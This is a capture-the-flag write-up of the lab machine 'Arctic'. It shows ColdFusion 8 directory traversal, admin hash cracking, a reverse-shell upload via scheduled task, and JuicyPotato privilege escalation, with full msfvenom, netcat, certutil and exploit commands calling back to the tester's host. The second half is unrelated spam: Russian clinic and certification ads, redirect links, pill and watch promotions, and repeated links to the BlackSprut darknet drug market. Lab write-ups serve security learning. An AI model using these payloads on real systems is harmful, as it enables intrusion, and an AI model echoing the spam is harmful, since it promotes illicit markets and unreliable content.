Note: In an attempt to be OSCP friendly, NONE of my write ups will utilize Metasploit. Zero. Zip. Tell your friends.
We’ll start with our basic nMap scan of all ports: nmap -A -p – 10.10.10.11

Navigate to the browser and see if 8500 loads up on anything (it’s slow as hell).

We’ve got a couple of directories, and a quick Google of CFIDE tells us we’er dealing with Adobe Cold Fusion.

Let’s browse through this directory a little bit and eventually we come to a login page:

A Google of Adobe Coldfusion 8 exploit takes us to an Exploit-DB page discussing directory traversal:

Within the Exploit it shows us the potential path for pulling administrator information, so let’s try navigating to that page:


We can see within the loaded page that there appears to be a hashed password. Let’s open up crackstation.net and see if we can determine what it is.

Perfect, we have a password. Let’s see if we can login now. I navigated back to http://10.10.10.11:8500/CFIDE/administrator/ and loged in with the new happyday password.

And we’re presented with the Administrator panel within Coldfusion.

I did some more research (Googling) and found a blog post discussing how a vulnerability within Coldfusion could allow a file/script to be uploaded to the server and then executed. So let’s try that. For your reference, the blog post is here: https://jumpespjump.blogspot.com/2014/03/attacking-adobe-coldfusion.html
It looks like Coldfusion uses Java, so we’ll use MSFVenom to create a Java payload that we’ll then upload to the server: msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.31 LPORT=1234 -f raw > shell.jsp

Next, from within the Scheduled Tasks window in Coldfusion, we’ll Schedule New Task.
We need to give it a name, a URL to download from (our Kali box), the username and password we found earlier, Save the output to a file, and give a file path and name: C:\ColdFusion8\wwwroot\CFIDE\script.jsp. We got the File path by looking around the Server Settings in Coldfusion, specifically in the Mappings directory.

Once you’ve got the appropriate fields filled out, click on “Submit”.

Next, from our Kali machien we’ll start our Simple HTTP Server so we can pull the file over when the Scheduled Task runs.

Let’s also start our NetCat listener: nc -lvp 1234

Now, let’s run our Scheduled Task:

We should see our file get copied over when we look at our Simple HTTP Server window:

And we also see the success from our web browser page:

Now, we need to navigate to the page to connect our shell. If we navigate to 10.10.10.11:8500/CFIDE we should see our newly uploaded file:

Now, let’s navigate to it and our NetCat connection should be live:

Priv Esc
From here, we can navigate to the C:\Users directory and see the user flag:

Note: In hindsight, I had some problems getting the exploit to work. So I’m going to walk you through some good practice on identifying what exploits might work, and then we’re gonna go a different route.
Windows Exploit Suggester
Let’s type systeminfo and see what we’re dealing with here:

Let’s take this information, copy it, and save it to a txt file we can then use with Windows Exploit Suggester. I saved mine as arctic-info.txt.
If you don’t have it already, you can get Windows Exploit Suggester from here: https://github.com/AonCyberLabs/Windows-Exploit-Suggester
The first thing you’re going to want to do after you download it is update the database: ./windows-exploit-suggester.py –update

This creates a database of exploits the script will then compare the systeminfo file you created against. To do that, run the following command: ./windows-exploit-suggester.py –database 2020-08-11-mssb.xls –systeminfo ../../Arctic/arctic-info.txt

We can see here it’s vulnerable to several things, including MS10-059. We used this exploit on Devel but I couldn’t get it to work on this machine. I tried three different repos with three different binaries for MS10-059 and they all failed/crashed. I’ve seen write-ups for this box where that exploit/vulnerability has worked. YMMV.
Juicy Potato
This is an attack I just learned about. After you have your shell on the box, run whoami /priv to get an idea of what privileges the account you’re on might have. We can see on this box there is the SeImpersonatePrivilege permission set, which we should be able to exploit:

With a Potato Attack, we can impersonate this token and utalize its permissions to do bad things. Details on how to conduct this type of attack are here: https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/
If you need a list of what Privileges might be exploitable when you type whoami /priv there is a great cheat sheet here: https://github.com/gtworek/Priv2Admin and https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#eop—impersonation-privileges
The GitHub page for Juicy Potato is here: https://github.com/ohpe/juicy-potato
Essentially, what we need to do is get an exploit that we write (like a reverse shell) and JuicyPotato.exe over to our target machine. Then we can leverage the token to execute our exploit with the NT Authority\System permissions the token has.
Ok, let’s get started. Use wget to get the latest JuicyPotato.exe from here: https://github.com/ohpe/juicy-potato/releases
wget https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe

Next, let’s build our exploit, a reverse shell binary we’ll have execute and create a NetCat connection back to our Kali machine: msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.20 LPORT=4444 -f exe > shell.exe

Now, let’s copy these files over to our target: certutil.exe -urlcache -split -f http://10.10.14.20/shell.exe shell.exe and certutil.exe -urlcache -split -f http://10.10.14.20/JuicyPotato.exe JuicyPotato.exe

Next, we need the Class Identifier, or CLSID, for our specific Operating System. We’ll remember from systeminfo our target machine is running Win 8 R2

You can get a list of CLSID’s from the JuicyPotato GitHub here: https://github.com/ohpe/juicy-potato/tree/master/CLSID/Windows_Server_2008_R2_Enterprise

Let’s try the first CLSID. So, our command to execute looks like this: JuicyPotato.exe -l 4444 -p C:\Users\tolis\Desktop\shell.exe -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}
Make sure you have your NetCat listener going and then run the command:

When we check our NetCat connection, it looks like we have nt authority\system

Медицинский центр предлагает всестороннюю медицинскую помощь для всей семьи.
Опытные врачи обладают высокой квалификацией и используют современное оборудование.
Мы обеспечиваем все удобства для диагностики и лечения.
Клиника предоставляет индивидуальный подход для каждого пациента.
Особое внимание мы уделяем профилактике заболеваний.
Наши пациенты могут ожидать оперативную помощь по доступным ценам.
wiki.blakebusinessservices.com
На территории Российской Федерации сертификация имеет большое значение в обеспечении качества и безопасности товаров и услуг. Она необходима как для производителей, так и для потребителей. Документ о сертификации гарантирует соответствие товара нормам и требованиям. Особенно это актуально для товаров, влияющих на здоровье и безопасность. Сертификация помогает повысить доверие к бренду. Также это часто является обязательным условием для выхода на рынок. В итоге, соблюдение сертификационных требований обеспечивает стабильность и успех компании.
оформление сертификатов
На этом ресурсе вы найдете учреждение ментального здоровья, которая предлагает поддержку для людей, страдающих от тревоги и других психологических расстройств. Мы предлагаем эффективные методы для восстановления психического здоровья. Врачи нашего центра готовы помочь вам решить проблемы и вернуться к гармонии. Квалификация наших врачей подтверждена множеством положительных обратной связи. Запишитесь с нами уже сегодня, чтобы начать путь к восстановлению.
http://javierrabinovich.com/__media__/js/netsoltrademark.php?d=empathycenter.ru%2Fpreparations%2Ff%2Ffenibut%2F
На этом ресурсе вы найдете центр психологического здоровья, которая обеспечивает профессиональную помощь для людей, страдающих от депрессии и других ментальных расстройств. Наша индивидуальный подход для восстановления ментального здоровья. Наши опытные психологи готовы помочь вам решить трудности и вернуться к психологическому благополучию. Профессионализм наших психологов подтверждена множеством положительных обратной связи. Свяжитесь с нами уже сегодня, чтобы начать путь к лучшей жизни.
http://lffc.email/__media__/js/netsoltrademark.php?d=empathycenter.ru%2Farticles%2Fgemofobiya-boyazn-vida-krovi%2F
На этом ресурсе вы найдете центр ментального здоровья, которая предлагает поддержку для людей, страдающих от тревоги и других психологических расстройств. Наша эффективные методы для восстановления психического здоровья. Врачи нашего центра готовы помочь вам преодолеть проблемы и вернуться к психологическому благополучию. Квалификация наших психологов подтверждена множеством положительных отзывов. Запишитесь с нами уже сегодня, чтобы начать путь к лучшей жизни.
http://limfrancis.com/__media__/js/netsoltrademark.php?d=empathycenter.ru%2Fpreparations%2Ff%2Ffenibut%2F
Keep working ,terrific job!
What i don’t realize is actually how you’re not really much more well-liked than you might be right now. You are very intelligent. You realize thus significantly relating to this subject, produced me personally consider it from a lot of varied angles. Its like women and men aren’t fascinated unless it’s one thing to accomplish with Lady gaga! Your own stuffs great. Always maintain it up!
Exquisite wristwatches have long been synonymous with precision. Expertly made by world-class watchmakers, they seamlessly blend heritage with cutting-edge engineering.
Each detail demonstrate superior quality, from hand-assembled movements to premium materials.
Owning a Swiss watch is a true statement of status. It represents refined taste and uncompromising quality.
Whether you prefer a bold statement piece, Swiss watches deliver remarkable precision that stands the test of time.
https://www.dqafansubs.com/forum/index.php?topic=193.new#new
Теневой интернет — это закрытая зона онлайн-пространства, доступ к которой только через защищенные браузеры, например, I2P.
Здесь доступны как законные, но и противозаконные платформы, включая магазины и другие платформы.
Одной из известных онлайн-площадок считается BlackSprut, которая предлагала реализации различных товаров, включая нелегальные продукты.
bs2best at сайт
Эти ресурсы нередко используют анонимные платежи для обеспечения конфиденциальности операций.
Тем не менее, правоохранительные органы регулярно блокируют основные нелегальные рынки, но на их месте возникают новые площадки.
We offer a comprehensive collection of trusted medicines to suit your health requirements.
Our platform ensures speedy and secure order processing right to your door.
All products comes from certified suppliers for guaranteed effectiveness and reliability.
You can search through our online store and get your medicines in minutes.
Got any concerns? Our support team is ready to assist you 24/7.
Take care of yourself with our trusted medical store!
https://www.vevioz.com/read-blog/273534_cenforce-a-affordable-and-effective-ed-solution.html
Почему BlackSprut привлекает внимание?
Сервис BlackSprut вызывает обсуждения разных сообществ. Но что это такое?
Данный ресурс предлагает широкие опции для аудитории. Оформление системы характеризуется простотой, что делает платформу понятной даже для тех, кто впервые сталкивается с подобными сервисами.
Важно отметить, что BlackSprut имеет свои особенности, которые отличают его в определенной среде.
Говоря о BlackSprut, стоит отметить, что многие пользователи имеют разные мнения о нем. Некоторые выделяют его функциональность, другие же рассматривают более критично.
Таким образом, BlackSprut остается объектом интереса и удерживает внимание разных слоев интернет-сообщества.
Доступ к BlackSprut – узнайте у нас
Хотите узнать свежее ссылку на БлэкСпрут? Это можно сделать здесь.
bs2best at сайт
Сайт часто обновляет адреса, поэтому важно знать актуальный домен.
Обновленный доступ всегда можно узнать у нас.
Посмотрите рабочую версию сайта прямо сейчас!